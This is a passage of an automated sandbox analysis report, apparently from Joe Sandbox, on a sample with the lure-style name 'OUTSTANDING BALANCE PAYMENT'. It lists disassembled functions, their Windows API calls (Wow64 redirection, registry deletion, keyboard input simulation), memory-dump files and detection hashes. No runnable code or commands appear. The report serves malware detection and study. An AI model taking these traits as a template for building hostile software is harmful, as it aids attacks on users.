                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000000,002842EC,?,002842AA,?), ref: 00284304
                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00284316
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                  • API String ID: 2574300362-1355242751
                                                                  • Opcode ID: d70e86e13cc789837674c54b3b7d0154969650f9e3be9b898254100bebd786f5
                                                                  • Instruction ID: 01d1b2529303fd13ca3cf6af17e9d0256dddee34f80236b7bf10b83840b3de43
                                                                  • Opcode Fuzzy Hash: d70e86e13cc789837674c54b3b7d0154969650f9e3be9b898254100bebd786f5
                                                                  • Instruction Fuzzy Hash: F3D0A7344157139FC7667F60E84C74276D8AB04301F10845AF442D21A0DBB0C8808750
                                                                  Function 0028434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,002841BB,00284341,?,0028422F,?,002841BB,?,?,?,?,002839FE,?,00000001), ref: 00284359
                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0028436B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                  • API String ID: 2574300362-3689287502
                                                                  • Opcode ID: eab07545227d738018657ad8d8da2ff0f555a957c0545b363788aaebc1dfceab
                                                                  • Instruction ID: 2661b58517724465695c7cb2137ff66be3e2092be553228c4fe7415380e76ba1
                                                                  • Opcode Fuzzy Hash: eab07545227d738018657ad8d8da2ff0f555a957c0545b363788aaebc1dfceab
                                                                  • Instruction Fuzzy Hash: 59D0A7344117139FC7267FB0E848B4276D8AB14715F10846AE482D2190DBB0D8808750
                                                                  Function 002C0539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,?,002C051D,?,002C05FE), ref: 002C0547
                                                                  • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 002C0559
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                  • API String ID: 2574300362-1071820185
                                                                  • Opcode ID: 14e0c32a7658921db4a7eefcce84483ee2469678b7e59167c5026ac2327df452
                                                                  • Instruction ID: 72e182d889fc21d30e56a6a2373e90046ca868f10c62b01b6b3047dc26d89e07
                                                                  • Opcode Fuzzy Hash: 14e0c32a7658921db4a7eefcce84483ee2469678b7e59167c5026ac2327df452
                                                                  • Instruction Fuzzy Hash: F9D0A730414713DFC7218FA1E888B82B6E8BB04301F50C41EE447D2250DA70C8808A50
                                                                  Function 002C0564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,002C052F,?,002C06D7), ref: 002C0572
                                                                  • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 002C0584
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                  • API String ID: 2574300362-1587604923
                                                                  • Opcode ID: c917f4390f2647ff4a1921f5eafa7d71a5fc2edddfab2f34161b8afb956ea409
                                                                  • Instruction ID: 2d1929f599a85dc9054a1512e5c92dfffb10fdde4f60c1356afa0d1eeadf4f90
                                                                  • Opcode Fuzzy Hash: c917f4390f2647ff4a1921f5eafa7d71a5fc2edddfab2f34161b8afb956ea409
                                                                  • Instruction Fuzzy Hash: 16D05E304547129BCB215F64A888B42B7E8AF04340F50861EE84292150DA70C4808A60
                                                                  Function 002DECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,002DECBE,?,002DEBBB), ref: 002DECD6
                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 002DECE8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                  • API String ID: 2574300362-1816364905
                                                                  • Opcode ID: 5a30ca3ca7db9f35919c74ca1cc4f1d622a2bd1fdb44ffb7319a1a7789267357
                                                                  • Instruction ID: 64509e3d4a77fc924a3abe98353a9f60f65b4157f08fb8077bb0d44b03dc2f00
                                                                  • Opcode Fuzzy Hash: 5a30ca3ca7db9f35919c74ca1cc4f1d622a2bd1fdb44ffb7319a1a7789267357
                                                                  • Instruction Fuzzy Hash: C8D0A7304217239FCF266FA1E88864276F8AB04300F01842BF846D2290DF70DC808650
                                                                  Function 002DBADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000000,002DBAD3,00000001,002DB6EE,?,0031DC00), ref: 002DBAEB
                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 002DBAFD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                                  • API String ID: 2574300362-199464113
                                                                  • Opcode ID: 6f309bec65a535bb25096811dae4beec73719ac13aa8d106c0f5b0b3f3858cab
                                                                  • Instruction ID: 0fae4002766b10834af0d50ad189f21b3eaf3145d0250e15d1783cdd2f62d8cc
                                                                  • Opcode Fuzzy Hash: 6f309bec65a535bb25096811dae4beec73719ac13aa8d106c0f5b0b3f3858cab
                                                                  • Instruction Fuzzy Hash: D6D0A730910713DFC7375F60E899B56B6D8BB05304F11441BEC43D2250DB70DC80C650
                                                                  Function 002E3BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,002E3BD1,?,002E3E06), ref: 002E3BE9
                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 002E3BFB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                  • API String ID: 2574300362-4033151799
                                                                  • Opcode ID: 5ebcc615e33c2661ab5f5a05a98f03fd70c55212f150b7a87e24c5de7776cb19
                                                                  • Instruction ID: ae82ec23d7900d488e67b7d58edfc2c393767a33c3d1e9272de2d070098370d0
                                                                  • Opcode Fuzzy Hash: 5ebcc615e33c2661ab5f5a05a98f03fd70c55212f150b7a87e24c5de7776cb19
                                                                  • Instruction Fuzzy Hash: 82D0A7B05507539FC7219FA5E84D643FAF8AB05315F20441BE446E3150DAB0D8808F50
                                                                  Function 002B9B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 98072edfda0eb1c5abcb6e3c0533d0e2fefe6c104b03814ec198ff815f031e21
                                                                  • Instruction ID: 9a05680d8b26d9c11e9fa7728707e37d9952141fc855718e0c382ebcb509c8f8
                                                                  • Opcode Fuzzy Hash: 98072edfda0eb1c5abcb6e3c0533d0e2fefe6c104b03814ec198ff815f031e21
                                                                  • Instruction Fuzzy Hash: 3AC18F75A1021AEFDB14DF94C884AEEB7B5FF48740F108599EA05EB251D730EE91CB90
                                                                  Function 002DAA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CoInitialize.OLE32(00000000), ref: 002DAAB4
                                                                  • CoUninitialize.OLE32 ref: 002DAABF
                                                                    • Part of subcall function 002C0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 002C027B
                                                                  • VariantInit.OLEAUT32(?), ref: 002DAACA
                                                                  • VariantClear.OLEAUT32(?), ref: 002DAD9D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                  • String ID:
                                                                  • API String ID: 780911581-0
                                                                  • Opcode ID: 4d33ab442324776a13b1ab2c0f6c7d59a0085cdef601008653b6f92efeb1d56a
                                                                  • Instruction ID: 935b42487705708097bed98246a13adc0f7573861a08eea8cfd27d2522dac20e
                                                                  • Opcode Fuzzy Hash: 4d33ab442324776a13b1ab2c0f6c7d59a0085cdef601008653b6f92efeb1d56a
                                                                  • Instruction Fuzzy Hash: 06A127352247019FDB11EF14C891F2AB7E5BF88710F14444AF9969B3A2CB70ED65CB86
                                                                  Function 002B91CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$AllocClearCopyInitString
                                                                  • String ID:
                                                                  • API String ID: 2808897238-0
                                                                  • Opcode ID: 175daa7ef90fc0823bc700fc2d4d0f7d2bc9cb2a185c18b802ff1772bba14c4e
                                                                  • Instruction ID: dea500df6d8c18db500a2e5c3f4351c45c0bb19f6413e438ac129928c6191e83
                                                                  • Opcode Fuzzy Hash: 175daa7ef90fc0823bc700fc2d4d0f7d2bc9cb2a185c18b802ff1772bba14c4e
                                                                  • Instruction Fuzzy Hash: A851B4346343069BDB24AF65D491BAEB3E9EF45394F20881FE756C72D1DB7098E08B01
                                                                  Function 002A365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                  • String ID:
                                                                  • API String ID: 3877424927-0
                                                                  • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                  • Instruction ID: 8e8aa9b7f419258f5493a3c59e9470cd6060a27cb6e72f02b4fa5ff04a907c7c
                                                                  • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                  • Instruction Fuzzy Hash: 4A51ABB1A20306ABDB24CF698D8456EB7A5AF42720F244729F825962D0DF74DF718F44
                                                                  Function 002CC396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00284517: _fseek.LIBCMT ref: 0028452F
                                                                    • Part of subcall function 002CC56D: _wcscmp.LIBCMT ref: 002CC65D
                                                                    • Part of subcall function 002CC56D: _wcscmp.LIBCMT ref: 002CC670
                                                                  • _free.LIBCMT ref: 002CC4DD
                                                                  • _free.LIBCMT ref: 002CC4E4
                                                                  • _free.LIBCMT ref: 002CC54F
                                                                    • Part of subcall function 002A1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,002A7A85), ref: 002A1CB1
                                                                    • Part of subcall function 002A1C9D: GetLastError.KERNEL32(00000000,?,002A7A85), ref: 002A1CC3
                                                                  • _free.LIBCMT ref: 002CC557
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                  • String ID:
                                                                  • API String ID: 1552873950-0
                                                                  • Opcode ID: 175c17775220f26e0e0cd87b3ee38f03475ae72a0804ab278d6a86c3e5061848
                                                                  • Instruction ID: 1db0c1ee4d505154631f7ccf0a99d882b08a47fea97bd4fe01970a1c293c7767
                                                                  • Opcode Fuzzy Hash: 175c17775220f26e0e0cd87b3ee38f03475ae72a0804ab278d6a86c3e5061848
                                                                  • Instruction Fuzzy Hash: 5D5163B5914219AFDF14AF64DC41BAEBBB9EF48310F10409EF21DA3281DB715A90CF59
                                                                  Function 002EC4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowRect.USER32(01206410,?), ref: 002EC544
                                                                  • ScreenToClient.USER32(?,00000002), ref: 002EC574
                                                                  • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 002EC5DA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ClientMoveRectScreen
                                                                  • String ID:
                                                                  • API String ID: 3880355969-0
                                                                  • Opcode ID: cd2681d1ba81b9ef1ea5733bcfbfe9f53d7d5ef4c87c36a3e67f27a254889250
                                                                  • Instruction ID: a2db269f16a443ab426ac95518969699967e0683efcbb8b03020ba21119011f7
                                                                  • Opcode Fuzzy Hash: cd2681d1ba81b9ef1ea5733bcfbfe9f53d7d5ef4c87c36a3e67f27a254889250
                                                                  • Instruction Fuzzy Hash: C9519275950245EFCF11DFA9C880AAE77B9FF85320FA08259F8259B290D730ED92CB50
                                                                  Function 002BC410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 002BC462
                                                                  • __itow.LIBCMT ref: 002BC49C
                                                                    • Part of subcall function 002BC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 002BC753
                                                                  • SendMessageW.USER32(?,0000110A,00000001,?), ref: 002BC505
                                                                  • __itow.LIBCMT ref: 002BC55A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$__itow
                                                                  • String ID:
                                                                  • API String ID: 3379773720-0
                                                                  • Opcode ID: b14ceb2c1203572266295a02e9bbb3a8e398b7385f20960d97f2d4dda1a16ebf
                                                                  • Instruction ID: 4e926d7362b2b27c08856490b62ffa3add1ddb770b0118d890bac64d890d1b33
                                                                  • Opcode Fuzzy Hash: b14ceb2c1203572266295a02e9bbb3a8e398b7385f20960d97f2d4dda1a16ebf
                                                                  • Instruction Fuzzy Hash: FD41E475A10209AFDF21EF54C856FEE7BB9AF49740F100019FA05B3281DB749A65CFA1
                                                                  Function 002C390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 002C3966
                                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 002C3982
                                                                  • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 002C39EF
                                                                  • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 002C3A4D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                  • String ID:
                                                                  • API String ID: 432972143-0
                                                                  • Opcode ID: 7611ef043be5d78ebd34e13912413e04732cdb097a904e83ce0da9a96837822a
                                                                  • Instruction ID: 65c807039659d106dde2554315814fe706e4a1d65041d2b786a80aae476f85a8
                                                                  • Opcode Fuzzy Hash: 7611ef043be5d78ebd34e13912413e04732cdb097a904e83ce0da9a96837822a
                                                                  • Instruction Fuzzy Hash: 17412930A20248AAEF30CF648805FFDBBB99B55310F04874EE4C1A21C1C7B59EA4DB61
                                                                  Function 002EB544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002EB5D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: InvalidateRect
                                                                  • String ID:
                                                                  • API String ID: 634782764-0
                                                                  • Opcode ID: a11f944c4ccf0d917846fa5d0208f77c5be8624e7ebeb9ee97205705184b950a
                                                                  • Instruction ID: 6aa8c34e8f3b52323720faffdd61f9dc404fe8faf53b982a002b3f6736ba1c75
                                                                  • Opcode Fuzzy Hash: a11f944c4ccf0d917846fa5d0208f77c5be8624e7ebeb9ee97205705184b950a
